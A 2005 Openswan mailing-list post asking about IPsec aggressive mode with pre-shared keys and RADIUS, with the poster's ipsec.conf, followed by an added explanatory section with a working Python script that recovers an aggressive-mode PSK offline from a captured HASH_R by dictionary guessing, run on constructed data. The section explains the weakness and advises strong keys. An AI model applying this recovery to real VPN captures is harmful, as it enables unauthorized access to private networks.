[Openswan Users] IPSec Aggressive Mode
Snitgen, John
John.Snitgen at tnsi.com
Mon Dec 12 11:49:31 CET 2005
Hello,
I'm attempting to establish an IPSec tunnel from a Linux box to a Cisco that is using a Radius server for authentication.
My questions:
When configured to use aggressive mode, is the 'left' parameter in ipsec.conf used as the Radius username? Is the PSK secret in (ipsec.secrets) used as the password for Radius authentication? Does 'rightid' need to be the IP address of the Radius server for my scenario?
Is XAUTH required? From what info I have gathered, it appears that XAUTH is only required if the Radius Server requires a different password than the ipsec secret passphrase.
I am running Openswan 1.0.7.
This is my ipsec.conf:
# /etc/ipsec/ipsec.conf - OpenSwan config file
# basic configuration
config setup
        # KLIPS: bind the virtual ipsec0 device to the PPP uplink
        interfaces="ipsec0=ppp0"
        klipsdebug=none
        plutodebug=all
        # load every conn with auto=add/route/start; start those with auto=start
        plutoload=%search
        plutostart=%search

conn %default
        keylife=24h
        ikelifetime=1h
        rekeymargin=9m
        rekeyfuzz=100%
        # IKE authentication by pre-shared key taken from ipsec.secrets
        authby=secret
        auth=esp
        # dead peer detection
        dpddelay=30
        dpdtimeout=60
        dpdaction=hold

conn LinuxToCisco
        # load at startup but do not initiate (bring up with: ipsec auto --up LinuxToCisco)
        auto=add
        #xauth=yes
        ike=3des-sha
        keyingtries=2
        disablearrivalcheck=no
        left=static_ip_address_of_Linux_box_ppp0_interface
        # IKE identity sent to the Cisco
        leftid=an_arbitrary_ip_address_that_matches_the_Radius_server's_account_username
        leftsubnet=static_ip_address_of_Linux_box_ppp0_interface/32
        leftnexthop=gateway_ip_for_the_ppp0_static_ip
        right=ip_address_of_Cisco_tunnel_endpoint
        rightid=ip_address_of_Cisco_tunnel_endpoint
        rightsubnet=xxx.xxx.xxx.0/24
        # IKEv1 phase 1 in aggressive mode: identities and HASH_R travel unencrypted
        aggrmode=yes
        pfs=no
Thanks for any insight,
John
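A caveat on the combination the post is asking about (aggrmode=yes with authby=secret), as an added example that is not part of the original message or of Openswan: in IKEv1 aggressive mode with pre-shared-key authentication, the responder's HASH_R goes out in the second message without encryption, and every input to it other than the PSK itself (both KE values, both cookies, the initiator's SA payload body, the responder's ID and both nonces) is visible on the wire. RFC 2409 defines SKEYID = prf(psk, Ni_b | Nr_b) and HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b), so a single captured exchange is enough for an offline dictionary attack on the PSK. The script below rebuilds that computation with prf = HMAC-SHA1 (matching a -sha IKE proposal), plays the responder with a constructed secret, then recovers the secret from a wordlist. All field contents, lengths (128-byte KE for modp1024, 20-byte nonces, 8-byte cookies, an arbitrary SAi_b size) and the IDir_b encoding are constructed assumptions, not a real capture.

```python
"""IKEv1 aggressive-mode PSK exposure: offline recovery of the secret from HASH_R.

Constructed demo, not Openswan code.  Everything HASH_R depends on except the
PSK is sent in clear text in aggressive-mode messages 1 and 2, so the PSK can
be guessed offline.  prf is HMAC-SHA1, as negotiated by an IKE proposal with
the SHA-1 hash attribute (e.g. ike=3des-sha).
"""
import hashlib
import hmac
from typing import Iterable, Optional


def prf(key: bytes, data: bytes) -> bytes:
    """RFC 2409 prf when the negotiated hash is SHA-1: HMAC-SHA1."""
    return hmac.new(key, data, hashlib.sha1).digest()


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    """RFC 2409 section 5.4, pre-shared key auth: SKEYID = prf(psk, Ni_b | Nr_b)."""
    return prf(psk, ni_b + nr_b)


def hash_r(skeyid: bytes, cap: dict) -> bytes:
    """RFC 2409 section 5: HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    return prf(skeyid, cap["gxr"] + cap["gxi"] + cap["cky_r"] + cap["cky_i"]
               + cap["sai_b"] + cap["idir_b"])


def responder_hash_r(psk: bytes, cap: dict) -> bytes:
    """The value the responder sends, unencrypted, in aggressive-mode message 2."""
    return hash_r(skeyid_psk(psk, cap["ni_b"], cap["nr_b"]), cap)


def recover_psk(observed_hash_r: bytes, cap: dict,
                wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Offline guess: recompute HASH_R per candidate; no packets are sent to the gateway."""
    for cand in wordlist:
        if hmac.compare_digest(responder_hash_r(cand, cap), observed_hash_r):
            return cand
    return None


def _filler(label: str, length: int) -> bytes:
    """Deterministic stand-in bytes for a captured field (constructed; not real DH output)."""
    out = b""
    i = 0
    while len(out) < length:
        out += hashlib.sha256(f"{label}:{i}".encode()).digest()
        i += 1
    return out[:length]


# Constructed "capture" of aggressive-mode messages 1 and 2.  Sizes assume
# modp1024 (128-byte KE), 20-byte nonces and 8-byte cookies; SAi_b length is
# arbitrary.  IDir_b is ID_IPV4_ADDR (type 1, protocol 0, port 0) + 192.0.2.1.
CAPTURE = {
    "cky_i": _filler("CKY-I", 8),
    "cky_r": _filler("CKY-R", 8),
    "sai_b": _filler("SAi_b", 56),
    "gxi": _filler("g^xi", 128),
    "gxr": _filler("g^xr", 128),
    "ni_b": _filler("Ni_b", 20),
    "nr_b": _filler("Nr_b", 20),
    "idir_b": bytes([1, 0, 0, 0, 192, 0, 2, 1]),
}

REAL_PSK = b"Summer2005!"   # the gateway's secret, constructed for the demo
WORDLIST = [b"cisco", b"password", b"Welcome1", b"Summer2005!", b"Summer2006!"]


def demo() -> Optional[bytes]:
    """Responder emits HASH_R; the eavesdropper replays the computation over the wordlist."""
    observed = responder_hash_r(REAL_PSK, CAPTURE)
    return recover_psk(observed, CAPTURE, WORDLIST)


if __name__ == "__main__":
    print("recovered PSK:", demo())
```

The same computation is what ike-scan's psk-crack runs against real captures. Main mode does not give this away as cheaply because there HASH_I and HASH_R are sent encrypted under keys derived from the Diffie-Hellman shared secret, which the observer does not have; aggressive mode trades that protection for the ability to identify the peer by leftid before the PSK is looked up. Practically: with aggrmode=yes and authby=secret, treat the PSK as something that must survive an offline attack (long and random, not an account-style password), and if the same string also serves as a RADIUS password, that password falls with it.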